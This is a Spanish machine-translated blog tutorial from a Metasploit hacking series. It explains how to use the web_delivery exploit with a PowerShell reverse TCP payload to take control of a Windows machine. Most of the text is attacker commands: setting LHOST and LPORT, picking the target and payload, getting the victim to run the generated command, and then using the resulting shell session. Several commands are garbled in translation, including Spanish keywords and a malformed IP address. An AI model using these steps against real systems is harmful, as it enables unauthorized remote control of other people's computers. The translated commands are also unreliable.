BlogWonderHowTo

Hack Like a Pro Metasploit para el aspirante a hacker, Parte 13 (Entrega web para Windows)

¡Bienvenido de nuevo, mi hacker noviciado!

En la parte anterior de esta serie, vimos cómo usar el exploit de entrega web de Metasploit para crear un script para conectarse a una máquina UNIX, Linux u OS X usando Python. Muchos miembros de la comunidad de bytes nulos me han preguntado: “¿Podemos hacer lo mismo con los sistemas Windows?” ¡La respuesta es sí!

Aunque el exploit de entrega web funcionará en sistemas Windows que tengan Python instalado, pocos sistemas Windows realmente tienen Python instalado, mientras que casi siempre UNIX, Linux y OS X tienen Python instalado de forma predeterminada. Afortunadamente, esos sistemas Windows tienen PowerShell instalado de forma predeterminada, y podemos usarlo con el exploit de entrega web de Metasploit para tomar el control de esos sistemas.

En este tutorial, usaremos el exploit de entrega web de Metasploit para tomar el control de un sistema Windows a través de su PowerShell.

Paso 1: Inicie Metasploit

Para comenzar, encienda su sistema Kali, abra una terminal e inicie Metasploit.

kali> msfconsole

Paso 2: carga del exploit de entrega web

Como ya se mencionó anteriormente, el uso de la entrega web de Metasploit es muy similar a la entrega web en sistemas Unix, Linux y OS X, excepto que los sistemas Windows no tienen Python instalado de forma predeterminada. Pero tienen Windows PowerShell y hay un módulo de entrega web para eso.

Carguemos el exploit de entrega web en Metasploit:

msf> use exploit / multi / script / web_delivery

A continuación, debemos configurar LHOST y LPORT exactamente como lo hicimos con el exploit de entrega web Unix / Linux / OS X.

msf> establecer LHOST 192.1681.153

msf> establecer LPORT 4444

A continuación, necesitamos configurar el URIPATH. Esto se puede configurar como desee. Lo configuré aquí en “powersploit”, pero puedes configurarlo como quieras.

msf> establecer URIPATH powersploit

Paso 3: establezca el destino en PowerShell

De forma predeterminada, el exploit de entrega web en Metasploit usa scripts de Python. Para usar la opción PowerShell basada en Windows, debemos establecer el objetivo en 2.

msf> establecer objetivo 2

Con el objetivo establecido en 2, Metasploit creará un script de PowerShell cuando estemos listos para explotar.

Paso 4: configurar la carga útil

Por último, necesitamos configurar la carga útil. Usemos el windows / powershell_reverse_tcp carga útil.

msf> establecer la carga útil de Windows / powershell_reverse_tcp

Antes de iniciar el exploit, set comprueba las opciones para ver si las tenemos todas configuradas correctamente.

Ahora, podemos escribir explotar y Metasploit iniciará un pequeño servidor web en segundo plano y generará un comando para que lo usemos en el sistema Windows.

A continuación, abra un símbolo del sistema en el sistema Windows de destino y ejecute ese comando como se muestra a continuación.

Cuando presiona enter, ese comando abrirá una conexión a la máquina de ataque.

Ahora, en el sistema de ataque, podemos verificar si la sesión se ha abierto escribiendo:

sesiones -l

Como puede ver arriba, tenemos una sesión abierta con un ID de 1. Podemos usar esa sesión escribiendo:

sesiones -i 1

Donde 1 es el ID de la sesión. Si su ID de sesión es diferente, como 2, 3, etc., debe usar ese ID en el comando anterior.

Ahora tenemos una sesión en la máquina de Windows. ¡Éxito! Ahora podemos verificar para ver los procesos en ejecución en el sistema de destino escribiendo:

PS C: Usuarios OTW> Obtener-Proceso

Ahora que estamos conectados al PowerShell de la máquina Windows, podemos ejecutar cualquiera de los “comandos-permite” de PowerShell, así como los comandos de Linux más comunes.

En un futuro tutorial, le mostraré cómo usar los módulos de PowerSploit para obtener aún más control y acceso en esa máquina con Windows, ¡así que siga regresando, mi hacker noviciado!

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar